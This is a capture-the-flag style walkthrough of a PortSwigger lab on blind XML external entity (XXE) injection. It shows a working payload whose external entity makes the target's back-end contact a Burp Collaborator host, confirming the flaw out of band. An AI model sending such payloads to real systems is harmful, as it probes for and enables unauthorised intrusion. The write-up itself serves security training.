> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/portswigger/xxe-xml-external-entities/blind-xxe-with-out-of-band-interaction.md).

# Blind XXE with out-of-band interaction

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F86B7Ip0gXfnCoiXU9Nj7%2Fimage.png?alt=media&amp;token=27137e06-aac5-4828-b7f6-6dfe25930cb4" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Exploitation</mark>

the lab has a "check stock" feature that parses XML input

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FSvZ1q2eLDQqbAT3WDhgI%2Fimage.png?alt=media&amp;token=813cffcd-0384-440b-be12-3a754db1b707" alt=""><figcaption></figcaption></figure></div>

send to repeater&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F5AUwv6VOHejr5QmGQjWw%2Fimage.png?alt=media&amp;token=6d05305d-c63c-41b4-b13f-209991303146" alt=""><figcaption></figcaption></figure></div>

this is a blind XXE

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FiotcgwUa4OS2gInVYzr6%2Fimage.png?alt=media&amp;token=f9e005d3-393f-4a43-bc75-42f415ef0bc3" alt=""><figcaption></figcaption></figure></div>

let's open collaborator in burp suite and get a url and try to issue a DNS lookup to this url to make sure that this website is vulnerable to blind XXE

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FA6pIoi47GMFyXtHKNZLX%2Fimage.png?alt=media&amp;token=f910d7d6-41ab-4346-bbe2-c9eb8d8831a2" alt=""><figcaption></figcaption></figure></div>

This XXE attack causes the server to make a `back-end HTTP` request to the specified URL (collaborator URL). The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful.

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://tgd18wllnshtjl7z3einaj853w9nxel3.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FGGszWfpNsK7sXAdVWNLp%2Fimage.png?alt=media&amp;token=48514ee1-7dec-4ab9-8c04-7afcf080ce73" alt=""><figcaption></figcaption></figure></div>

so the attack is successfull because the backend server of the website issued a DNS lookup to the attacker server so the website is vulnerable to blind XXE.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F2bhVlmYflp8MA28tZC39%2Fimage.png?alt=media&amp;token=e8968c0d-48a4-4d29-90a5-db3df83d4053" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FzImOIfrQYqUsnsM0pk91%2Fimage.png?alt=media&amp;token=39596a3e-a06d-41c1-afd0-ebdb7325f98c" alt=""><figcaption></figcaption></figure></div>

hope you found this walkthrough easy to understand and follow

Greeting From [<mark style="color:red;">**Sayonara**</mark>](https://github.com/ismail-arame)
